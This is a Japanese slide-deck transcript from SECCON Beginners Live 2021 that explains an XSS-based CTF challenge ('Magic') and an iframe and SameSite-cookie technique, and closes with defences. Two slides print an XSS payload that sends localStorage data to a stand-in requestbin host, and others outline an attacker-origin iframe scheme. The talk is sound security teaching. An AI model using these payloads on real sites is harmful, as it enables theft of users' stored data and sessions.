Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021

Hi120ki
October 17, 2021
Technology
0
990

Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021

SECCON Beginners Live 2021 発表スライド
https://connpass.com/event/225707/

Hi120ki

October 17, 2021
Tweet

More Decks by Hi120ki

See All by Hi120ki
Reversing基礎編 / Basics of Reversing - SECCON Beginners Live 2022
hi120ki
5
2k
CTF大会開催はいいぞ。- 魔女のお茶会 2021冬 / Guide for holding CTF events
hi120ki
2
1.3k

Other Decks in Technology

See All in Technology
生成AIをより賢く エンジニアのための RAG入門 - Oracle AI Jam Session #20
kutsushitaneko
4
260
Oracle Cloudの生成AIサービスって実際どこまで使えるの? エンジニア目線で試してみた
minorun365
PRO
4
290
普通のエンジニアがLaravelコアチームメンバーになるまで
avosalmon
0
110
Wantedly での Datadog 活用事例
bgpat
1
530
祝!Iceberg祭開幕!re:Invent 2024データレイク関連アップデート10分総ざらい
kniino
3
320
統計データで2024年の クラウド・インフラ動向を眺める
ysknsid25
2
850
DevFest 2024 Incheon / Songdo - Compose UI 조합 심화
wisemuji
0
120
Fanstaの1年を大解剖! 一人SREはどこまでできるのか!?
syossan27
2
170
ハイテク休憩
sat
PRO
2
170
大幅アップデートされたRagas v0.2をキャッチアップ
os1ma
2
540
私なりのAIのご紹介 [2024年版]
qt_luigi
1
120
Google Cloud で始める Cloud Run 〜AWSとの比較と実例デモで解説〜
risatube
PRO
0
110

Featured

See All Featured
Designing for Performance
lara
604
68k
10 Git Anti Patterns You Should be Aware of
lemiorhan
PRO
656
59k
Why Our Code Smells
bkeepers
PRO
335
57k
Documentation Writing (for coders)
carmenintech
66
4.5k
Bootstrapping a Software Product
garrettdimon
PRO
305
110k
Gamification - CAS2011
davidbonilla
80
5.1k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
111
49k
Typedesign – Prime Four
hannesfritz
40
2.4k
Done Done
chrislema
181
16k
YesSQL, Process and Tooling at Scale
rocio
169
14k
Fashionably flexible responsive web design (full day workshop)
malarkey
405
66k
Embracing the Ebb and Flow
colly
84
4.5k

Transcript

  1. Magic Web SECCON Beginners Live 2021 hi120ki

  2. @hi120ki CTF Wani Hackase Web Reversing 2 2021 Reversing :

    firmware Web : json, magic

  3. Web Magic 3

  4. Magic [Web Hard] : 31solve Web 5 • • 4

  5. 5 /

  6. 6 /

  7. 7 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...

  8. 8 / URL

  9. 9 /

  10. 10 crawler/index.js puppeteer Node.js Chrome URL

  11. 11 2. FLAG 3. URL crawler/index.js 1.

  12. 12 FLAG nginx/html/static/index.js FLAG

  13. 13 FLAG JavaScript XSS( )

  14. XSS 14 HTML Web HTML JavaScript Cookie Web

  15. 15 https://magic.quals.beginners.seccon.jp/ FLAG FLAG

  16. 16 https://magic.quals.beginners.seccon.jp/?????????? FLAG FLAG <script>…</script>

  17. 17 FLAG <script>…</script> FLAG https://magic.quals.beginners.seccon.jp/??????????

  18. 18 <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script> FLAG XSS URL

  19. XSS 19 magic/views/index.ejs <script> </script>

  20. 20 alert(1)

  21. 21 FLAG URL <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script>

  22. 22 FLAG URL

  23. 23 XSS https://magic.quals.beginners.seccon.jp/

  24. 24 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ ✕ XSS

  25. 25 ... + = ? XSS

  26. 26 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ URL <script>…</script> FLAG

  27. 27 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...

  28. 28 URL

  29. 29 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ <script>…</script> FLAG XSS

  30. 30 FLAG 1. FLAG 2. 3.

  31. 31

  32. 1. XSS 2. 3. 32

  33. 1. XSS 2. 3. 33 FLAG

  34. 1. XSS 2. 3. 34

  35. 1. XSS 2. 3. 35

  36. 36 FLAG

  37. XSS • • Byte Bandits CTF 2020 Notes App •

    https://github.com/ByteBandits/bbctf-2020 37

  38. Byte Bandits CTF 2020 Notes App 38 https://example.com/login?username= &password= •

    FLAG iframe • • API

  39. iframe 39 https://attacker.example.com/ iframe1 iframe2 URL iframe https://example.com/ https://example.com/ URL

    iframe

  40. iframe 40 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ iframe 2 iframe

  41. iframe 41 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG <script>...</script> XSS

    FLAG

  42. iframe 42 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG FLAG (top.iframe1.document.body.innerHTML)

    <script>...</script>

  43. 43 iframe SameSite Cookie None Lax

  44. 44 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=None iframe Cookie Cookie (session=nj49gn...)

    FLAG

  45. 45 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=Lax iframe Cookie Cookie (session=nj49gn...)

    FLAG

  46. SameSite Cookie=Lax 46 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ Cookie Cookie

    (session=nj49gn...) ✕ FLAG <script>...</script>

  47. 47 SameSite Cookie=None iframe CTF

  48. 48 Cookie : SameSite, HttpOnly, Secure... Content-Security-Policy X-Frame-Options ... (

    XSS Content-Security-Policy )

  49. 49 FLAG +

  50. 50 Magic https://github.com/SECCON/Beginners_CTF_2021/tree/main/web/magic/files Freepik from Flaticon https://www.flaticon.com/free-icon/hacker_924874 https://www.flaticon.com/free-icon/programmer_560216 https://www.flaticon.com/free-icon/flag_473724 writeup

    https://hi120ki.github.io/blog/posts/20210523-3/